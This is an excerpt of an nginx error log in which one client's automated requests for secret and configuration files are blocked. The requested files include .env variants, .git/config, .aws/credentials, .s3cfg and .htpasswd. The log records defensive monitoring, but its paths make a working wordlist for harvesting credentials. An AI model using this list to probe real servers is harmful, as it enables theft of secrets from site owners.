by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3/keys.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:10 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3/secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:10 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3cfg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:10 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3cfg.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3cfg.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3cfg~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.settings.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.smtp-credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.smtp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.svn/entries HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.travis.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.vscode/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.yarnrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /admin/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:52 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /ansible/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:52 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api-gateway/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:54 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api-gateway/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:54 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api-gateway/.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:54 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api-gateway/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:54 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api-gateway/.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:54 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api-gateway/.env.staging HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:59 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api/shared/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /api/shared/config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:23 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:24 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:24 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /apps/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:28 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /aws/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:28 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /aws/.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:29 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /aws/.env.ses HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /aws/s3/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /awstats/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:55 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:28:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backup/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /backups/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:11 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /conf/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:14 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:15 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:15 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:15 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:15 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:15 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:15 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:17 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:17 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:17 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.htaccess HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:17 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /config/.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /core/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:49 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /crm/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:49 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /cron/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:50 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /data/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /db/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:29:59 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /development/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /docker/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /docker/app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:04 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /env/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /hidden/.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /hidden/.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:12 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /hidden/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:19 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /js/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:19 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /k8s/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:21 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /kubernetes/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:22 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /kyc/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:22 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:23 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:24 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /local/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:27 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /mail/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:27 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /mailer/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:28 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /main/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:35 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /mysql/.my.cnf HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /new/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /new/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /new/.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:36 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /new/.env.staging HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /nginx/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /node/.env_example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /node_modules/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /old/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:39 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /portal/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:41 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /private/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:41 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:42 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:42 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:42 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/.aws/secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:44 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/.s3cfg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/uploads/.bucket HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /public/uploads/.s3cfg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:47 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /resources/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:49 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /s3/.aws HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:49 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /s3/.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:51 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /s3/.aws/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:51 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /s3/.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:51 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /s3/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:51 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /s3/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:56 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /secret/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:30:59 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /server/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:04 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:04 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:04 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /site/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by 